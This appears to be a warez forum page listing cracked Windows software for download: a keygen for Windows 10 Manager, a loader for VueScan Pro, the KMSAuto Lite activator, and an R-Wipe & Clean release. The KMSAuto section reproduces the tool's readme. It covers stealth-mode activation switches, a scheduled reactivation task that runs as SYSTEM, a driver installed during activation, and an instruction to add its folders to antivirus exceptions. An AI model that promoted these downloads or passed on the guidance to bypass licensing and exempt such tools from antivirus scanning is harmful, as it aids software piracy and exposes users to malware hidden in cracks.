Safeguard your sensitive files and folders security, encrypt files, move system folders to safe locations; Privacy Protector ensures privacy and keeps sensitive information secure by eliminating tracks; File Undelete recovers and restores deleted or formatted files on logical disks; Locks some system features to improve security. Network Optimizes and tweaks your internet connection and network settings; Tweaks Microsoft Edge browser settings; IP Switcher can switch between different network settings easily; Edits the Hosts file to speed up system surfing internet; Wi-Fi Manager can view and manage all your wireless network. Misc. Utilities Creates scheduled tasks or the monitorings that trigger tasks; Shows and run the useful collection of utility that built-in your Windows; Splits a file into several smaller files or merges back to the original file; Super Copy is the powerful tool to copy files or backup automatically; Operates your Registry easily using the Registry Tools. Windows 10 Manager 3.1.0-keygen.rar
  13. KMSAuto Lite Portable by Ratiborus, MSFree Inc. System requirements: ————————————————————————————————— Windows XP, Windows Vista, 7, Windows 8, 8.1, 10, Server 2008, 2008 R2, 2012, 2012 R2, 2016, 2019, Office 2010/2013/2016/2019 VL editions. **** The program does NOT require any version .NET Framework. **** Description: ————————————————————————————————— KMSAuto Lite - KMS-activator for the operating systems Windows VL editions: Vista, 7, 8, 8.1, 10, Server 2008, 2008 R2, 2012, 2012 R2, 2016, 2019, and Office 2010, 2013, 2016, 2019. Also you can activate Office 2010 VL on Windows XP. The switches provide access to the installation GVLK keys and configure the task scheduler. Advanced startup options of the program (keys): ————————————————————————————————— /win=act - Run the program in stealth mode, activate Windows and exit the program. /ofs=act - Run the program in stealth mode, activate Office and exit the program. /wingvlk=inst - Run the program in stealth mode, install the Windows key and exit the program. /ofsgvlk=inst - Run the program in stealth mode, install the Office keys and exit the program. /sched=win - Create a task scheduler to activate Windows every 25 days. /sched=ofs - Create a task scheduler to activate Office every 25 days. *** Keys installed forcibly, parameters can be applied all together. *** Convert RETAIL -> VL possible only for non-activated office products. On the "Settings" tab, you can specify the external address of the KMS Service. Built-in program service will not run when activated . If activation fails 0xc004f074, make sure that your firewall does not prohibit a connection with your KMS-Service. If you create a task scheduler for reactivation (in the program for this purpose is special tab), the program can move wherever you want, you can even completely remove it, it is not necessary to reactivate. Installing KMS-Service: ————————————————————————————————— On the "Settings" tab you can install into the system KMS-Service, Windows 7-8 can be activated their own of it, if configured, at the address 127.0.0.2:port, and on your network adress can be activated any systems and offices. Installed server does not conflict with the task scheduler or manual activation, if used buttons "Activate Windows" and "Activate Office". If your system is 8.1, on the process of activation will be installed a special driver, which is removed at the end of activation. For this configuration must be installed "== Integrated KMS-Service ==". You can also configure the activation of an external server, upon activation by pressing the buttons at Main program window your system settings are not changed, they will be restored immediately after activation. Using two buttons at the bottom window "Settings", you can view logfile of a running server. "At me nothing activated !!!!" ————————————————————————————————— Perhaps you have a non-VL product, which is not intended to activate using KMS-Service (Windows 7 Ultimate this program does NOT ACTIVATE), or your antivirus blocks the activation. ————————————————————————————————————————————————————————————————— Ratiborus Changes in versions: v1.5.2 -Task in the scheduler when using methods WinDivert and Hook is created on behalf of SYSTEM. v1.4.9 -Changes in the interface. v1.4.5 -Added KMS38 Activation metod. v1.4.4 -Fixed bugs. v1.4.2 -KMS Server Service v2.0.7. v1.4.0 -Added W10 Digital License Activation metod. v1.3.9 -Changes in the interface. v1.3.8 -Changes in the interface. v1.3.7 -The program is completely rewritten. v1.3.5.3 -Added GVLK Keys. v1.3.5 -Changes in the interface. *** It is necessary to add folders "C:\Windows\KMSAutoS" and "KMSAuto_Files" to exceptions to your antivirus !!! v1.3.4 -Fixed bugs. -KMS Server Service v2.0.4. v1.3.3 -Fixed minor bugs. v1.3.2 -Added GVLK Keys. v1.3.1 -Added Keys for Windows Server 2016 Essentials. -KMSSS v2.0.3 v1.3.0 -Added Keys for Windows Server 2016. v1.2.9 -KMSSS v2.0.0. v1.2.8 -Re-compiled KMS Service. v1.2.7 -Added Keys for Windows 10 and Office 2016. v1.2.5 -Small changes in program code. v1.2.4 -Changes in program for compatibility with antivirus software. -Fixed the nonworking "Install KMS-Service" button. v1.2.2 -Added Keys for Windows 10 and Office 2016. v1.2.1 -Added interface translation into Ukrainian. -Added program for Windows 10 "Show or hide updates" v1.2.0 -Re-compiled KMS Service. -Added Keys for Windows 10 and Office 2016. v1.1.9 -Added switch "Random IP address". v1.1.8 -Added ability to convert Office 2010 ProPlus on Windows 7-10. v1.1.7 -In program now is built utility to save and restore activation. v1.1.6 -Added interface translation into Vietnamese. v1.1.5 -Added function correcting work MS Excel. -KMS Log Analyzer works with the original logfile KMS-Service. -Small changes in the program interface. v1.1.4 -Can launch only one copy of the program. -Fixed a bug at which key win=act was not working on Windows 7 v1.1.3 -Changes in the interface. -Added function "Delete state invalid system" v1.1.2 -Changes in the interface. v1.1.1 -Changes in the interface. -Added new functions. -Fixed a bug with the forced installation of the keys. -New version of the KMS-Service, fixed output HWid. v1.1.0 -Changes in the interface. -Added new functions. v1.0.8 -Changes in the interface. -Added English interface. v1.0.7 -Changes in the interface. -The program now remembers the position of her window on the screen. -Added command line switches. -Added ability to set up a local KMS-Service with the specified parameters. v1.0.6 -Changes in the interface. -Added new command line switch. -Changed algorithm some features of the program. v1.0.5.1 -Changes in the interface. -Added ability to set your address KMS-Service and any port. -Added ability to convert Office 2013 products on Windows 7-10. v1.0.4 -Changes in the interface. -Added ability to run the program with the keys. -Added ability to create a task scheduler for reactivation Windows and Office every 25 days. This function does not work on Windows XP. v1.0.3 -Changes in the interface. -Added ability to install GVLK keys forcibly. v1.0.2 -Fixed error with installation keys. v1.0.1 -Changes in the interface. -Added ability to install GVLK keys. v1.0.0 -First version, test. [/more] Windows 10 and office 2019, 1903 Build 18362.30 April 2019 activator.rar
  14. Anonymous

    VueScan Pro 9.6.42 Loader

    VueScan Professional is free to download from our software library. VueScan – the world’s most popular scanner software, is used extensively by photographers, home users, scanning services and corporations. It works with most high-quality flatbed and film scanners to produce scans that have excellent color fidelity and color balance. This is very easy to use, and also has advanced features for restoring faded colors, batch scanning and other features used by professionals. Vue-Scan can output scanned documents, photos, and film in PDF, JPEG, TIFF formats. It can also recognize text using OCR and create multi-page pdfs using both flatbed scanners and scanners with automatic document feeders. Vue-Scan is a replacement for the software that came with your scanner. Whether you are looking for more advanced features that your scanner vendor doesn’t provide, or your scanner vendor no longer supports your scanner, Vue-Scan helps you get the most out of your scanner. Vue-Scan changes nothing on your system, installs nothing in your system and all other scanner software will continue to function. Accessing your WiFi enabled scanner has never been easier. Vue-Scan Mobile allows you to seamlessly scan documents and photos straight to your iPhone, iPad, or iPod Touch from HP, Canon, and Epson WiFi printer/scanners. In addition to sending via Email and saving to the Photos App, Vue-scan Mobile allows you to save scanned images to your favorite iOS apps that can open PDF or JPEG files such as iBooks, Dropbox, GoodReader, Evernote, etc. VueScan Pro 9.6.42 Loader.rar
  15. Anonymous

    R-Wipe & Clean 20.0.2239

    R-Wipe & Clean is a complete solution to wipe useless files and keep your computer privacy. Irretrievably deletes private records of your on- and off-line activities, such as temporary internet files, history, cookies, autocomplete forms and passwords, swap files, recently opened documents list, Explorer MRUs, temporary files, etc., traces from more than 100 third-party applications, and free up your disk space. The utility wipes files and unused disk space using either fast or secure erase algorithms. All files and folders may be combined in wipe lists to erase them in a single procedure. All separate wiping and cleaning tasks can be combined in one or more erasing procedures launched immediately or at predefined times or events as a background task. R-Wipe & Clean includes Popup Blocker and supports Internet Explorer, NETSCAPE, AOL, MSN, Opera, Mozilla, Mozilla Firefox, and BT Yahoo browsers as well as the Google and MSN toolbars. R-Wipe & Clean 20.0.2239.txt